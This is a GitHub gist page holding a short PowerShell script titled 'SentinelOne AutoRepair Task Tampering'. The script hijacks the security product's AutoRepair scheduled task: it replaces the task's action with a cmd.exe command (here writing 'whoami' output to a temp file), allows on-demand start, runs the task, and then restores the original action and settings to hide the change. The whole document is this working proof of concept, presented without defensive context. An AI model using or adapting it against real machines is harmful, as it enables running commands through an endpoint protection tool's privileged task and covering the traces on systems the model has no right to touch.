Created
May 15, 2025 16:11
-
-
Save keyboardcrunch/835757c8386d3c5ad557f10e8d406132 to your computer and use it in GitHub Desktop.
SentinelOne AutoRepair Task Tampering
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Get the task info | |
| $TaskName = $(get-scheduledtask -TaskName AutoRepair* -TaskPath \Sentinel\).TaskName | |
| $settings = $(get-scheduledtask -TaskName $TaskName -TaskPath \Sentinel\).Settings | |
| $action = $(get-scheduledtask -TaskName AutoRepair* -TaskPath \Sentinel\).Actions | |
| # Tweak settings objects | |
| $new_action = New-ScheduledTaskAction -Execute "C:\Windows\System32\cmd.exe" -Argument "/c whoami > C:\Windows\Temp\IAM.txt" | |
| $settings.AllowDemandStart=$true | |
| # Apply changes | |
| Set-ScheduledTask -TaskPath \Sentinel\ -TaskName $TaskName -Settings $settings | |
| Set-ScheduledTask -TaskPath \Sentinel\ -TaskName $TaskName -Action $new_action | |
| # Run the task | |
| Start-ScheduledTask -TaskPath \Sentinel\ -TaskName $TaskName | |
| # Fix things back up | |
| $settings.AllowDemandStart=$false | |
| Set-ScheduledTask -TaskPath \Sentinel\ -TaskName $TaskName -Settings $settings | |
| Set-ScheduledTask -TaskPath \Sentinel\ -TaskName $TaskName -Action $action |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment